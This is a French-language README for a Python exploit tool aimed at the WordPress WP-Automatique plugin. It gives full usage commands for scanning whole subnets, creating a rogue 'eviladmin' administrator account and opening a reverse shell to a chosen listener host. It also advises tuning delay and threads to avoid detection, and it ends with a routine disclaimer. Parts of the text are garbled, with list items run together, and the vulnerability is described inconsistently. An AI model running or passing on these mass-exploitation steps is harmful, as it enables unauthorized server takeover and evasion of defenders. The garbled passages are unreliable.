Ce script Python automatise le processus de création d'un nouveau compte d'administrateur dans un site WordPress et d'exécution d'un shell inversé sur le serveur cible. Il utilise la vulnérabilité d'injection CSV du plugin WP-Automatique pour exécuter des requêtes SQL sur la base de données WordPress et gagner un accès administratif.
Analyse d'un sous-réseau : Si vous souhaitez scanner un sous-réseau pour les installations WordPress vulnérables, vous pouvez utiliser l'option --subnet . Par exemple:
python wp-automatic-exploit.py --subnet 192.168.1.0/24 --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 1.0
Cette commande analysera le sous-réseau 192.168.1.0/24 pour les sites WordPress avec le plugin Vulnérable WP Automatic, et tenter de les exploiter à l'aide des paramètres d'écoute fournis.
Personnalisation du retard : le retard entre les demandes peut être ajusté à l'aide de l'option --delay . Un délai plus élevé peut aider à éviter la détection ou la limitation du taux, tandis qu'un délai plus bas peut accélérer le processus d'exploitation. Par exemple:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 2.5
Cette commande utilisera un retard de 2,5 secondes entre les demandes.
À l'aide d'un écouteur distant : si votre écouteur est configuré sur une machine distante, vous pouvez spécifier son adresse IP et son port à l'aide des options --lhost et --lport . Par exemple:
python wp-automatic-exploit.py --targets targets.txt --lhost 192.168.1.100 --lport 8080 --threads 10 --delay 1.0
Cette commande se connectera à un écouteur sur 192.168.1.100:8080 .
Augmentation du nombre de threads : vous pouvez augmenter le nombre de threads utilisés par le script avec l'option --threads . Cela peut accélérer le processus d'exploitation, mais peut également augmenter la probabilité de détection ou provoquer des problèmes de limitation des taux. Par exemple:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 20 --delay 1.0
Cette commande utilisera 20 threads pour l'exploitation.
requests (installer via pip install requests )domain dans le script par l'URL du site WordPress cible.eviladmin , définira le mot de passe et attribuera les privilèges administratifs.Remarque: Assurez-vous que vous avez une autorisation et des autorisations appropriées avant d'exécuter ce script, car cela peut entraîner des vulnérabilités de sécurité et des conséquences juridiques si elle est mal utilisée.
Ce script est fourni à des fins éducatives et testées uniquement. L'auteur n'assume aucune responsabilité pour une utilisation non autorisée ou illégale de ce script. Utilisez-le à vos propres risques.